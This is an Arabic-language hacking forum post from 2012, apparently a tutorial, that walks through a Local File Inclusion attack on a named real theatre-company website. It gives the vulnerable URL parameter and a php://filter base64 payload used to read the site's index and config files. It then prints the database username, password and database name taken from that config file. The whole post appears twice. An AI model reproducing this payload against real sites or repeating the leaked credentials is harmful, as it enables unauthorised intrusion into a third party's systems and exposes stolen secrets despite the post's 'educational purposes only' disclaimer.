Omar hcj
07-27-2012, 09:46 AM
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف: http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/ تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
انتهى الشرح و سأترككم الان مع الصور
http://www7.0zz0.com/2012/07/27/06/659407030.png
http://www7.0zz0.com/2012/07/27/06/493543474.png
http://www7.0zz0.com/2012/07/27/06/494803396.png
http://www7.0zz0.com/2012/07/27/06/989108733.png
http://www7.0zz0.com/2012/07/27/06/698277923.png
والحمد لله رب العالمين
لا تنسونا من خير الدعاء لي و لوالديه
والرجاء عدم تدمير المواقع الإسلامية و الثقافية التعليمية ولو كانت انكليزية
الهدف من الدرس لأغراض تعليمية فقط !!!
انتهى
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف: http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/ تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
انتهى الشرح و سأترككم الان مع الصور
http://www7.0zz0.com/2012/07/27/06/659407030.png
http://www7.0zz0.com/2012/07/27/06/493543474.png
http://www7.0zz0.com/2012/07/27/06/494803396.png
http://www7.0zz0.com/2012/07/27/06/989108733.png
http://www7.0zz0.com/2012/07/27/06/698277923.png
والحمد لله رب العالمين
لا تنسونا من خير الدعاء لي و لوالديه
والرجاء عدم تدمير المواقع الإسلامية و الثقافية التعليمية ولو كانت انكليزية
الهدف من الدرس لأغراض تعليمية فقط !!!
انتهى